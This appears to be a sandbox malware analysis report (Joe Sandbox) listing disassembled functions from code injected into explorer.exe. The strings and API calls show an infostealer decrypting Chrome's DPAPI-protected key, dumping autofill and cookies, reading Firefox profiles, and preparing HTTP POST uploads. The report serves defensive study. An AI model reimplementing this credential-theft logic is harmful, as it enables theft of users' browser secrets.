                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                            • String ID: *.*$\*.*
                                                                                                                            • API String ID: 232625764-1692270452
                                                                                                                            • Opcode ID: f48f7e192fc555afdf7a839f175406d8068e83c3d1a100a7a4c182faa3ead535
                                                                                                                            • Instruction ID: 00fc9a59bd715dcc5cd16c593f11d57c9bf0bb2f4186ada46411036d11b6581e
                                                                                                                            • Opcode Fuzzy Hash: f48f7e192fc555afdf7a839f175406d8068e83c3d1a100a7a4c182faa3ead535
                                                                                                                            • Instruction Fuzzy Hash: AA31A2703043419BCB50FB318899A6F76E99FCD744F00692FF94A82261EB3E8805D75A
                                                                                                                            Function 00433E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 689 433e04-433e11 call 431b6a 692 433e17-433e22 call 431c31 689->692 693 433ed4-433ed8 689->693 692->693 696 433e28-433e34 call 432fb1 692->696 699 433e3a-433e4f call 43123b 696->699 700 433ec8-433ecc 696->700 703 433e51-433e58 699->703 704 433ec0-433ec7 call 431011 699->704 700->693 705 433e5a-433e6a 703->705 706 433ebf 703->706 704->700 708 433eb8-433eba call 431011 705->708 709 433e6c-433e7c RtlCompareMemory 705->709 706->704 708->706 709->708 711 433e7e-433ea6 CryptUnprotectData 709->711 711->708 713 433ea8-433ead 711->713 713->708 714 433eaf-433eb3 713->714 714->708
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                              • Part of subcall function 00431C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00433E1E,00000000,?,00433FA8), ref: 00431C46
                                                                                                                              • Part of subcall function 00431C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00433FA8), ref: 00431C56
                                                                                                                              • Part of subcall function 00431C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00433FA8), ref: 00431C76
                                                                                                                              • Part of subcall function 00431C31: CloseHandle.KERNEL32(00000000,?,00433FA8), ref: 00431C91
                                                                                                                              • Part of subcall function 00432FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00433E30,00000000,00000000,?,00433FA8), ref: 00432FC1
                                                                                                                              • Part of subcall function 00432FB1: lstrlen.KERNEL32("encrypted_key":",?,00433FA8), ref: 00432FCE
                                                                                                                              • Part of subcall function 00432FB1: StrStrIA.SHLWAPI("encrypted_key":",0048692C,?,00433FA8), ref: 00432FDD
                                                                                                                              • Part of subcall function 0043123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00433E4B,00000000), ref: 0043124A
                                                                                                                              • Part of subcall function 0043123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00431268
                                                                                                                              • Part of subcall function 0043123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00431295
                                                                                                                            • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00433E74
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00433E9E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                            • String ID: $DPAP$DPAP$IDPAP
                                                                                                                            • API String ID: 3076719866-957854035
                                                                                                                            • Opcode ID: 39f665bae939b6eae9aa1a3c3d1c90fbf3f280208bcf1cb6cdf1258b25312ca1
                                                                                                                            • Instruction ID: b0032937909933d3408493918c34a570717f1206a3648e3a32c95b4ae7180184
                                                                                                                            • Opcode Fuzzy Hash: 39f665bae939b6eae9aa1a3c3d1c90fbf3f280208bcf1cb6cdf1258b25312ca1
                                                                                                                            • Instruction Fuzzy Hash: 8721C2326043455BD711EE698881A6FB2ECAB8C702F44196FF841C6351EB7CCE45879A
                                                                                                                            Function 00434B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0043116F
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00434BB6
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00434BBF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1675517319-0
                                                                                                                            • Opcode ID: 8ab8904125a2a2ccd6f424c65d55d3e40c8f4f6ad0208e222aee63cd0b602233
                                                                                                                            • Instruction ID: 40cd99f509c437f8a4e0bb1b1873fcbd814021511e775b208da4ae44a310acda
                                                                                                                            • Opcode Fuzzy Hash: 8ab8904125a2a2ccd6f424c65d55d3e40c8f4f6ad0208e222aee63cd0b602233
                                                                                                                            • Instruction Fuzzy Hash: BAE0923140021067C658BB71BC09A8BBB589FDE365F10996EB165921A1CA39A8408758
                                                                                                                            Function 00436512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemInfo.KERNELBASE(004920A4,00000001,00000000,0000000A,00483127,004328DA,00000000,?), ref: 0043BFFC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 31276548-0
                                                                                                                            • Opcode ID: 4b182b3c74395a3ba507cb3b62a102b8e6aaa7796a0fa1e8dceb7d81ed9db1a5
                                                                                                                            • Instruction ID: b7d16b539208ed4488a91efc5582298ffc07980ae27fc346125a67ac0917f8c6
                                                                                                                            • Opcode Fuzzy Hash: 4b182b3c74395a3ba507cb3b62a102b8e6aaa7796a0fa1e8dceb7d81ed9db1a5
                                                                                                                            • Instruction Fuzzy Hash: 82E0ED3178430275EA1437BA7D07F1A19494B8DB04F61EA3BB710AA1EADB9D9141102E
                                                                                                                            Function 00433C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 00433C6A
                                                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00433C76
                                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 00433C7D
                                                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00433C89
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00433D2F
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00433D36
                                                                                                                            • wsprintfA.USER32 ref: 00433D55
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00433D61
                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 00433D89
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00433DB2
                                                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00433DED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                            • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                            • API String ID: 2923052733-3488123210
                                                                                                                            • Opcode ID: 96b1fca0ed9d498312dd552b045496cc6cf07b330028b29c6767e20485dce176
                                                                                                                            • Instruction ID: a82415301a97074fd923797ba43989cf1c4a4a629178f12ee63a6563f569790d
                                                                                                                            • Opcode Fuzzy Hash: 96b1fca0ed9d498312dd552b045496cc6cf07b330028b29c6767e20485dce176
                                                                                                                            • Instruction Fuzzy Hash: 6741D330204201ABD714BF75CC85E3F76A9EF89749F00182EF845A7262DB3DDD01876A
                                                                                                                            Function 004328F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 348 4328f8-4328fa 349 432900-43291c call 431000 call 4502ec 348->349 350 432ac8-432ada call 483848 DeleteFileW call 431011 348->350 359 432922-43293a call 431fa7 349->359 360 432a8f-432aa2 call 44fb92 lstrlen 349->360 357 432adf-432ae6 350->357 365 432948-43295f call 431fa7 359->365 366 43293c-432942 359->366 367 432ac1-432ac3 call 431011 360->367 368 432aa4-432abc call 431798 * 3 360->368 376 432961-432967 365->376 377 43296d-432984 call 431fa7 365->377 366->365 369 432944 366->369 367->350 368->367 369->365 376->377 379 432969 376->379 383 432992-4329a7 call 431fa7 377->383 384 432986-43298c 377->384 379->377 388 4329b5-4329cc call 431fa7 383->388 389 4329a9-4329af 383->389 384->383 386 43298e 384->386 386->383 393 4329da-4329e5 lstrlen 388->393 394 4329ce-4329d4 388->394 389->388 390 4329b1 389->390 390->388 396 4329eb-4329f0 lstrlen 393->396 397 432a79-432a85 call 4502ec 393->397 394->393 395 4329d6 394->395 395->393 396->397 399 4329f6-432a11 call 431000 396->399 397->359 402 432a8b 397->402 404 432a13 399->404 405 432a1b-432a56 call 432112 wsprintfA lstrlen 399->405 402->360 404->405 408 432a6a-432a74 lstrcat call 431011 405->408 409 432a58-432a68 call 43102f 405->409 408->397 409->408
                                                                                                                            APIs
                                                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00432AD2
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 004329E1
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 004329EC
                                                                                                                            • wsprintfA.USER32 ref: 00432A38
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00432A44
                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00432A6C
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 00432A99
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                            • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                            • API String ID: 304071051-2605711689
                                                                                                                            • Opcode ID: 3ee07d16000734c23d43e1b2b02ba24af01e8efd0ec79fc15e3a3c056ef7b255
                                                                                                                            • Instruction ID: affb394bf665f759dd65e57abefbdacb19f60197a20edc743272e863678be094
                                                                                                                            • Opcode Fuzzy Hash: 3ee07d16000734c23d43e1b2b02ba24af01e8efd0ec79fc15e3a3c056ef7b255
                                                                                                                            • Instruction Fuzzy Hash: 6B51AE706043468BD725EF219990B3F77E9AF89308F04582EF8859B262DB7DDC058B5A
                                                                                                                            Function 00432CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 484 432cb5-432cc7 call 431953 488 432e17-432e2d call 432ae9 484->488 489 432ccd-432d06 call 431953 call 431000 * 2 call 431b6a 484->489 500 432df9-432e12 call 431011 * 4 489->500 501 432d0c-432d1c GetPrivateProfileSectionNamesW 489->501 500->488 501->500 503 432d22-432d26 501->503 505 432df5 503->505 506 432d2c-432d32 503->506 505->500 507 432d36-432d39 506->507 509 432d3f-432d4d StrStrIW 507->509 510 432ded-432df1 507->510 512 432d53-432d70 GetPrivateProfileStringW 509->512 513 432dd7-432de7 lstrlenW 509->513 510->505 512->513 515 432d72-432d88 GetPrivateProfileIntW 512->515 513->507 513->510 517 432d8a-432d9c call 431953 515->517 518 432dcc-432dd2 call 432ae9 515->518 523 432db4-432dca call 432ae9 call 431011 517->523 524 432d9e-432da2 517->524 518->513 523->513 525 432da4-432daa 524->525 526 432dac-432db2 524->526 525->526 526->523 526->524
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                            • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00432D13
                                                                                                                            • StrStrIW.SHLWAPI(00000000,Profile), ref: 00432D45
                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,Path,0048637C,?,00000FFF,?), ref: 00432D68
                                                                                                                            • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00432D7B
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00432DD8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                            • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                            • API String ID: 2234428054-4107377610
                                                                                                                            • Opcode ID: 3dc251deddff9da3afe2cca044a6669ae09452c39fb299b406b5ec23eb02ef43
                                                                                                                            • Instruction ID: fc31e920b34436885553947df72526934025fb3b63be5925a88d4c0822bc2bbc
                                                                                                                            • Opcode Fuzzy Hash: 3dc251deddff9da3afe2cca044a6669ae09452c39fb299b406b5ec23eb02ef43
                                                                                                                            • Instruction Fuzzy Hash: 643190307043019BCA54BF31991162F76A2AFCD704F10583FF946A7392DBBD8C46975A
                                                                                                                            Function 00431333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 576 431333-431385 call 431000 call 43106c call 4312a3 583 4313a0-4313a3 576->583 584 431387-43139e 576->584 586 4313aa-4313ac 583->586 587 4313b0-4313b2 584->587 586->587 588 4315cb-4315da call 431011 587->588 589 4313b8-4313ef RtlZeroMemory 587->589 593 4315c3-4315ca 589->593 594 4313f5-43141a 589->594 593->588 597 431420-431456 call 4310b1 594->597 598 4315bf 594->598 601 431458 597->601 602 43145d-431478 597->602 598->593 601->602 604 4315b5 602->604 605 43147e-431483 602->605 604->598 606 431485-431496 605->606 607 43149d-4314c7 call 431000 wsprintfW 605->607 606->607 610 4314e0-431509 607->610 611 4314c9-4314cb 607->611 618 4315a5 610->618 619 43150f-43151b 610->619 612 4314cc-4314cf 611->612 613 4314d1-4314d6 612->613 614 4314da-4314dc 612->614 613->612 616 4314d8 613->616 614->610 616->610 621 4315ac-4315b0 call 431011 618->621 619->618 622 431521-431537 call 431000 619->622 621->604 626 431539-431544 622->626 627 431546-431553 call 43102f 626->627 628 431558-43156f 626->628 627->628 632 431573-43157d 628->632 633 431571 628->633 632->626 634 43157f-431583 632->634 633->632 635 431585 call 43104c 634->635 636 43159a-4315a1 call 431011 634->636 639 43158a-431594 RtlMoveMemory 635->639 636->618 639->636
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                              • Part of subcall function 0043106C: lstrlen.KERNEL32(02A565AE,00000000,00000000,00000000,00431366,76228A60,02A565AE,00000000), ref: 00431074
                                                                                                                              • Part of subcall function 0043106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02A565AE,00000001,00000000,00000000), ref: 00431086
                                                                                                                              • Part of subcall function 004312A3: RtlZeroMemory.NTDLL(?,00000018), ref: 004312B5
                                                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 004313C2
                                                                                                                            • wsprintfW.USER32 ref: 004314B5
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00431594
                                                                                                                            Strings
                                                                                                                            • Accept: */*Referer: %S, xrefs: 004314AF
                                                                                                                            • POST, xrefs: 00431465
                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 004314FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                            • API String ID: 3833683434-704803497
                                                                                                                            • Opcode ID: 51a8f09065b5e4e4bef2c97e8e36c558d2670e3e96d9db6cf9712ebeff319e4e
                                                                                                                            • Instruction ID: 3bbafe940943dc6f4cdd405cbcd8d9a3d3f7e45b7ea613c109dc022c9b4a2862
                                                                                                                            • Opcode Fuzzy Hash: 51a8f09065b5e4e4bef2c97e8e36c558d2670e3e96d9db6cf9712ebeff319e4e
                                                                                                                            • Instruction Fuzzy Hash: D6717970608301AFD7549F65DC88A2FBBE9EB88344F00592EF955D3262DB38DD048B5A
                                                                                                                            Function 0043A40E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 641 43a40e-43a424 642 43a4a2-43a4aa 641->642 643 43a426-43a42a 641->643 646 43a4ae-43a4c8 642->646 644 43a431-43a441 643->644 645 43a42c-43a42f 643->645 647 43a443 644->647 648 43a469-43a4a0 memcpy 644->648 645->642 645->644 649 43a4cc-43a4d8 646->649 650 43a445-43a448 647->650 651 43a44a-43a45a memcpy 647->651 648->646 653 43a4e1-43a4e3 649->653 650->648 650->651 652 43a45d 651->652 654 43a45f-43a466 652->654 655 43a4e5-43a4ee 653->655 656 43a524-43a538 call 43a2aa 653->656 655->656 660 43a4f0-43a4ff call 43a250 655->660 656->652 661 43a53e-43a553 memset 656->661 660->649 664 43a501-43a51f call 43a1c6 660->664 661->654 664->654
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$FileReadmemset
                                                                                                                            • String ID: winRead$SH
                                                                                                                            • API String ID: 2051157613-3770183200
                                                                                                                            • Opcode ID: de055421dd6964a9f9218ce99b98db4be6b8af024dd66989f64ae7d72cc05319
                                                                                                                            • Instruction ID: d0082008dab0a1f47317ffbb5ef472d7f62856dea9cbc27ffc455e370c7e6f0c
                                                                                                                            • Opcode Fuzzy Hash: de055421dd6964a9f9218ce99b98db4be6b8af024dd66989f64ae7d72cc05319
                                                                                                                            • Instruction Fuzzy Hash: 7331CE32208300AFC740DE19CC8599FB7E6EFD8314F84692AF98587310D678EC258B9B
                                                                                                                            Function 0043A67C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 667 43a67c-43a692 668 43a6c1-43a6c4 667->668 669 43a694-43a6bf _alldiv _allmul 667->669 670 43a6c7-43a6d2 call 43a33b 668->670 669->670 673 43a6f0 670->673 674 43a6d4-43a6df 670->674 676 43a6f9-43a6fb 673->676 675 43a6e4-43a6ee call 43a1c6 674->675 681 43a722-43a726 675->681 678 43a71e 676->678 679 43a6fd-43a708 676->679 678->681 679->678 685 43a70a-43a71c 679->685 683 43a73a-43a740 681->683 684 43a728-43a72b 681->684 684->683 686 43a72d 684->686 685->675 687 43a734-43a737 686->687 688 43a72f-43a732 686->688 687->683 688->683 688->687
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File_alldiv_allmul
                                                                                                                            • String ID: @TH$winTruncate1$winTruncate2
                                                                                                                            • API String ID: 3568847005-1035160094
                                                                                                                            • Opcode ID: 6503685d69a2283648e846f700648fd23395ab5c9aa71f08d9c9039f15587a6d
                                                                                                                            • Instruction ID: 1d5520689964af2132963533dec8b2872f7fc675543f0af680feead7463845ac
                                                                                                                            • Opcode Fuzzy Hash: 6503685d69a2283648e846f700648fd23395ab5c9aa71f08d9c9039f15587a6d
                                                                                                                            • Instruction Fuzzy Hash: DA21D371240100ABCB149E29CCC5E6B37A9EF88310F15912FFD94CB295D738DC20C7AA
                                                                                                                            Function 0043B87B Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 202fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 715 43b87b-43b88a 716 43b88d-43b8e3 memset 715->716 717 43b903 716->717 718 43b8e5-43b8f3 call 43b64b 716->718 720 43b905-43b914 call 43b609 717->720 723 43baf3-43baf9 718->723 724 43b8f9-43b901 718->724 726 43bae3 720->726 727 43b91a-43b923 call 43b828 720->727 724->720 728 43bae8-43baf1 call 4368ec 726->728 733 43bad6-43bae1 call 4368ec 727->733 734 43b929-43b941 727->734 728->723 733->728 736 43b943-43b944 734->736 737 43b946-43b94d 734->737 739 43b950-43b962 736->739 737->739 740 43b965-43b96e 739->740 741 43b975-43b97c 740->741 742 43b9cb-43b9e4 call 43a2aa 741->742 743 43b97e-43b983 741->743 750 43ba41-43ba46 742->750 751 43b9e6-43b9fd call 4368ec * 2 742->751 745 43b9b6-43b9c9 call 43a250 743->745 746 43b985-43b9aa call 436614 call 43bb9f call 436620 743->746 745->740 745->742 770 43b9b2 746->770 771 43b9ac-43b9b0 746->771 754 43ba54-43ba6e call 4368ec * 2 750->754 755 43ba48-43ba52 750->755 768 43ba14-43ba3c call 43a1c6 call 484db2 751->768 769 43b9ff-43ba04 751->769 772 43ba70-43ba72 754->772 773 43ba74 754->773 755->754 768->723 769->768 774 43ba06-43ba0f 769->774 770->745 771->742 771->770 776 43ba79-43ba8a 772->776 773->776 774->716 778 43ba90-43baa2 call 4852ae 776->778 779 43ba8c 776->779 784 43baa4 778->784 785 43baa8-43bad4 778->785 779->778 784->785 785->723
                                                                                                                            APIs
                                                                                                                            • memset.NTDLL ref: 0043B8D5
                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0043B96F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFilememset
                                                                                                                            • String ID: psow$winOpen$SH
                                                                                                                            • API String ID: 2416746761-2626843210
                                                                                                                            • Opcode ID: e1c33f019aa7778aa3ab4493f41131532cdecafba25ffbb2c1b7423441d54f7b
                                                                                                                            • Instruction ID: a6bc3635bf1e25f794eeb70a581a1d6f23cd2750c812a04803b1acaee0b060a9
                                                                                                                            • Opcode Fuzzy Hash: e1c33f019aa7778aa3ab4493f41131532cdecafba25ffbb2c1b7423441d54f7b
                                                                                                                            • Instruction Fuzzy Hash: A7715D71A04702AFC710EF25C88175AB7E0FF8C724F105A2EFA6497291D778D954CB9A
                                                                                                                            Function 0043B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
